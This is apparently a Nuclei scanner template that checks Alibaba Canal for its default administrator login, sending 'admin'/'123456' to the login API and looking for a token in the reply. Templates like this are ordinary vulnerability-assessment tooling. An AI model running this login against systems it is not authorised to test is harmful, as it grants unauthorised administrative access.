id: canal-default-login

info:
  name: Alibaba Canal Default Login
  author: pdteam
  severity: high
  description: An Alibaba Canal default login was discovered.
  reference:
    - https://github.com/alibaba/canal/wiki/ClientAdapter
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  tags: alibaba,default-login
  metadata:
    max-request: 1

http:
  - raw:
      - |
        POST /api/v1/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - 123456

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: and
        words:
          - 'data":{"token"'
          - '"code":20000'

# Enhanced by mp on 2022/03/22
